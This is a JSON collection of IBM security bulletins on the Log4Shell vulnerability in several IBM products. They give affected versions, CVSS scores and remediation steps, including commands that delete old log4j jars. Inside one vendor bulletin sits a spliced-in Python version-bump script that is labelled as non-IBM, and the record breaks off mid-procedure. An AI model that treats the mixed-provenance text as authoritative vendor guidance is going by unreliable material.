false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-15T00:04:01", "id": "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "href": "https://www.ibm.com/support/pages/node/6541160", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:07", "description": "## Summary\n\nThere is a vulnerability in the version of the Log4j open source library that is part of IBM Data Virtualization on Cloud Pak for Data\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **DV Version(s)**| **CPD Version(s)** \n---|---|--- \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.3.0| 2.5.0 \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.4.1| 3.0.1 \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.5.0| 3.5, 3.5 Refresh 1 - 9 \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3 \n \n## Remediation/Fixes\n\n**Affected Product(s)**| **DV Version(s)**| **CPD Version(s)**| **Fixes** \n---|---|---|--- \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.3.0| 2.5.0| Upgrade to DV 1.5.0 patch 1.5.0.0-270 / CPD 3.5 Refresh 10 \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.4.1| 3.0.1| Upgrade to DV 1.5.0 patch 1.5.0.0-270 / CPD 3.5 Refresh 10 \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.5.0| 3.5, 3.5 Refresh 1 - 9| Apply DV patch 1.5.0.0-270 / CPD 3.5 Refresh 10 \nIBM Data Virtualization (DV) on Cloud Pak for Data (CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3| Update to DV 1.7.3 / CPD 4.0 Refresh 4 \n \n**You must update the Cloud Pak for Data platform to version 4.0 Refresh 4 to install the Log4Shell fix for Data Virtualization.**\n\nTo update the Cloud Pak for Data platform to 4.0 Refresh 4, see the following links:\n\n * [Updating Data Virtualization from Version 3.5](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v35.html> \"Updating Data Virtualization from Version 3.5\" )\n * [Updating Data Virtualization from Version 4.0.1 or later](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v4.html>)\n\nIf you are upgrading from IBM Cloud Pak for Data 4.0 Refresh 3, the Data Virtualization pods will restart after the db2u operator is updated. 
If the db2u operator subscription installPlanApproval is set to \"Automatic\", the Data Virtualization pods will restart when the db2u operator catalog is updated. After the restart of the Data Virtualization pods is complete, you must also manually restart the header and worker pods to complete the Log4Shell fix. This manual restart can be performed by running the following command:\n \n \n current_replicas=$(oc get sts c-db2u-dv-db2u -o jsonpath=\"{.spec.replicas}\");oc scale sts c-db2u-dv-db2u --replicas=0; sleep 3m; oc scale sts c-db2u-dv-db2u --replicas=$current_replicas\n\nIf you are upgrading from a version of IBM Cloud Pak for Data other than 4.0 Refresh 3, you can restart Data Virtualization head and worker pods after the upgrade has finished successfully. \n \nYou can also run the following commands to delete old files from your updated Data Virtualization instance that contained old log4j binaries.\n \n \n 1. oc rsh c-db2u-dv-db2u-0\n 2. su - db2inst1\n 3. rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\n 4. ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar\" \n 5. ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\"\n 6. rm -rf /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.zip\n 7. 
cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config\n 8. cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.3_20211119_164257.zip /mnt/PV/versioned/uc_dsserver_shared/config\n\n## Additional Information\n\n_If you run a security vulnerability scanning tool on the Docker images, you might find that some of the affected packages at the affected version are still present in them. Those packages have been modified according to guidance provided by the log4j development team so that they are no longer vulnerable._\n\nScanners that match on the jar version string alone will therefore keep reporting those packages; a check that looks inside the jar for the JndiLookup class distinguishes the modified packages from unpatched ones.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n22 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSK1AQ\",\"label\":\"IBM Data Virtualization\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF043\",\"label\":\"Red Hat\"}],\"Version\":\"1.3.0\\/2.5.0, 1.4.1\\/3.0.1, 1.5.0\\/3.5, 1.5.0\\/3.5 Refresh 1 - 9, 1.7.1 - 1.7.3\\/4.0 Refresh 1 - 3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T23:01:42", "type": "ibm", "title": "Security Bulletin: IBM Data Virtualization on Cloud Pak for Data is affected by critical vulnerability in Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-28T23:01:42", "id": "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "href": "https://www.ibm.com/support/pages/node/6536734", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:35:58", "description": "## Summary\n\nThe Apache Log4j 2 library is used by IBM Maximo Scheduler Optimization (MSO). This bulletin provides remediation for the Apache Log4j 2 vulnerability (CVE-2021-44228) through the steps applicable to the MSO product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nProduct| Component| Platform| Version| Log4j Version \n---|---|---|---|--- \nIBM Maximo Scheduler Optimization| Application| Platform Independent| 7.6.8.0| 2.13.2 \nIBM Maximo Scheduler Optimization| Application| Platform Independent| 8.0.0| 2.13.2 \n \n## Remediation/Fixes\n\n**How to manually update Maximo Scheduler Optimization 7.6.8 (MSO) to Apache Log4j 2.17.1**\n\nThis manual process updates the Log4j 2 reference inside the build.gradle files. 
\n\n \n1) Modify the following build.gradle files: \n \n<mso_home>/maintenance-optimization-framework/mof-execution-service/build.gradle \n<mso_home>/maintenance-optimization-framework/mof-rest-service/build.gradle \n<mso_home>/maintenance-optimization-framework/mof-common/build.gradle \n \nand replace the lines: \n \n //Logging - Log4j2\n implementation group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.13.2'\n implementation group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.13.2'\n \nwith: \n \n //Logging - Log4j2\n implementation group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.17.1'\n implementation group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.17.1'\n \n2) Execute the build script buildMOF.sh (Linux) or buildMOF.bat (Windows) to rebuild the application archive files. \n \n3) Rebuild the MSO application Docker images and redeploy them to the container registry that is used to host the images. \n \n4) Terminate any currently active MSO API (rest service) or execution service pods so that new pods, using the updated images, are created.\n\n**How to manually update Maximo Scheduler Optimization 8.0.0 (MSO) to Apache Log4j 2.17.1**\n\nUpdate the Maximo Scheduler Optimization 8.0.0 installed on Maximo Application Suite (MAS) to version 8.0.3 of MSO.\n\n### Update the **Maximo Scheduler Optimization** application\n\nWhen new versions of applications are available, you can update the deployed applications.\n\nTo update an application:\n\n 1. From the Suite Administration Applications pane, select the Addon tab and find the Maximo Scheduler Optimization application that you want to update.\n 2. 
On the application summary page, confirm that the version is 8.0.3 or later, then click **Update**.\n\n## Workarounds and Mitigations\n\nFor MSO 7.6.8, replace the Log4j 2.13.2 reference in the build.gradle files with 2.17.1 or later, as described in Remediation/Fixes.\n\nFor MSO 8, update to 8.0.3 or the latest available version.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
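Step 1 of the MSO 7.6.8 procedure above can be scripted so that the same edit is applied to all three build.gradle files and checked, rather than done by hand in each file. The following Python is an added example, not IBM's or the MSO project's code: it rewrites only the `org.apache.logging.log4j` `log4j-api` and `log4j-core` coordinates, bumps versions below 2.17.1 to 2.17.1, leaves other dependencies alone, reports files in which no Log4j coordinate was found at all, and is safe to run twice. The build.gradle contents are constructed to mirror the lines quoted in the bulletin; the guava dependency is invented filler to show that unrelated lines stay untouched, and the mof-common sample is shown already at 2.17.1 to demonstrate that a second run changes nothing.

```python
"""Scripted form of step 1 of the MSO 7.6.8 procedure (added example,
not IBM's or the MSO project's code). Rewrites only the org.apache.logging.log4j
log4j-api/log4j-core coordinates in build.gradle text, bumps versions below the
target to the target, leaves other dependencies alone, and is safe to run twice.
The build.gradle contents below are constructed; the guava line is filler."""
import re

TARGET = "2.17.1"

# Matches: group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.13.2'
LOG4J_DEP_RE = re.compile(
    r"(group:\s*'org\.apache\.logging\.log4j',\s*name:\s*'(log4j-(?:api|core))',"
    r"\s*version:\s*')(\d+\.\d+(?:\.\d+)?)(')"
)


def parse_version(text):
    """'2.13.2' -> (2, 13, 2), so versions compare numerically rather than as strings."""
    return tuple(int(part) for part in text.split("."))


def bump_log4j(gradle_text, target=TARGET):
    """Return (new_text, changes); changes is a list of (artifact, old, new)."""
    changes = []

    def replace(match):
        prefix, artifact, old, quote = match.groups()
        if parse_version(old) >= parse_version(target):
            return match.group(0)  # already at or above the target: leave it alone
        changes.append((artifact, old, target))
        return f"{prefix}{target}{quote}"

    return LOG4J_DEP_RE.sub(replace, gradle_text), changes


def bump_files(files, target=TARGET):
    """files: {path: text}. Returns (updated, changes_by_path, unmatched).
    unmatched lists files with no Log4j coordinate at all, so a file named in
    the procedure that silently matched nothing does not go unnoticed."""
    updated, changes_by_path, unmatched = {}, {}, []
    for path, text in files.items():
        new_text, changes = bump_log4j(text, target)
        updated[path] = new_text
        if changes:
            changes_by_path[path] = changes
        elif not LOG4J_DEP_RE.search(text):
            unmatched.append(path)
    return updated, changes_by_path, unmatched


# Constructed sample mirroring the lines quoted in the bulletin; guava is filler.
SAMPLE_BUILD_GRADLE = """dependencies {
    //Logging - Log4j2
    implementation group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.13.2'
    implementation group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.13.2'
    implementation group: 'com.google.guava', name: 'guava', version: '30.1-jre'
}
"""

MOF = "<mso_home>/maintenance-optimization-framework"
SAMPLE_FILES = {
    f"{MOF}/mof-execution-service/build.gradle": SAMPLE_BUILD_GRADLE,
    f"{MOF}/mof-rest-service/build.gradle": SAMPLE_BUILD_GRADLE,
    # shown already updated, to demonstrate that a second run changes nothing
    f"{MOF}/mof-common/build.gradle": SAMPLE_BUILD_GRADLE.replace("2.13.2", "2.17.1"),
}


if __name__ == "__main__":
    updated, changes, unmatched = bump_files(SAMPLE_FILES)
    for path, items in changes.items():
        print(path, items)
    print("files without any Log4j coordinate:", unmatched)
```

The rewrite covers direct declarations only. If another dependency pulls in log4j-core transitively, `gradle dependencyInsight --dependency log4j-core --configuration runtimeClasspath` shows the version that actually resolves; Gradle's default conflict resolution picks the highest version, so the direct 2.17.1 declaration wins over a lower transitive one, but the insight report is the place to confirm that before rebuilding the images in step 3.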
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSLKT6\",\"label\":\"Maximo Asset Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.6.8\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-01T22:33:25", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Apache log4j versions 2.0 beta 9 - 2.14 (CVE-2021-44228) in IBM Maximo Scheduler Optimization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228"], "modified": "2022-07-01T22:33:25", "id": "207BA1F7EAE0F24909102A8E9F71F4E090F16E370A882E1CE68B1B6EFB5952F4", "href": "https://www.ibm.com/support/pages/node/6527990", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:01", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Telco Network Cloud Manager to provide logging functionality. This vulnerability has been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nAgile Lifecycle Manager| 2.x \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.1 \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.2 \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.3.0 \nIBM Cloud Pak for Network Automation| 2.1 \n \n## Remediation/Fixes\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM Telco Network Cloud Manager - Orchestration (TNCO)| TNC-O 1.1 ~ TNC-O 1.3.0| Upgrade to IBM Cloud Pak for Network Automation v2.2: <https://www.ibm.com/docs/en/cloud-paks/cp-network-auto/2.2> \nIBM Cloud Pak for Network Automation| v2.1| Upgrade to IBM Cloud Pak for Network Automation v2.2: <https://www.ibm.com/docs/en/cloud-paks/cp-network-auto/2.2> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSDSJH\",\"label\":\"IBM Telco Network Cloud Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:12:47", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Telco Network Cloud Manager (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T15:12:47", "id": 
"C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "href": "https://www.ibm.com/support/pages/node/6536668", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:46", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by Netcool/Omnibus 8.1. This vulnerability is only present when either of the 'Administrator GUI' or 'Operator GUI' features are installed. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nNetcool/OMNIbus| 8.1.0.25 \nNetcool/OMNIbus| 8.1.0.26 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability by applying the interim fix below:\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nOMNIbus| 8.1.0.27| IJ36502| <https://www.ibm.com/support/pages/node/6483703> \n \n## Workarounds and Mitigations\n\nIBM recommends installing Tivoli Netcool/OMNIbus 8.1.0.27 or later.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHTQ\",\"label\":\"Tivoli Netcool\\/OMNIbus\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"8.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T19:00:38", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Netcool/Omnibus 8.1 (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T19:00:38", "id": "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "href": "https://www.ibm.com/support/pages/node/6527948", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:36", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Financial Crimes Insight for Claims Fraud for generating logs in some of its components. This bulletin provides mitigations for the Log4Shell vulnerability (CVE-2021-44228) by applying the applicable workaround steps to IBM Financial Crimes Insight for Claims Fraud.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nFinancial Crimes Insights Platform | All \nCFM - Banking, Healthcare, Insurance, Government | All \n \n## Remediation/Fixes\n\nThe recommended solution is to apply the fix for Elastic Search and Hadoop as in steps below as soon as possible.\n\n**Steps for Elastic Search:**\n\nTo fix the log4j vulnerability in Elastic Search for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. Log into OpenShift cluster using `oc login` from Ambari server.\n 2. Ensure all Elastic Search pods are healthy and Running. \n \n oc get po | grep fci-elasticsearch\n \n\n 3. Set the `JVM` property to apply log4j fix. To set, complete the following commands. 
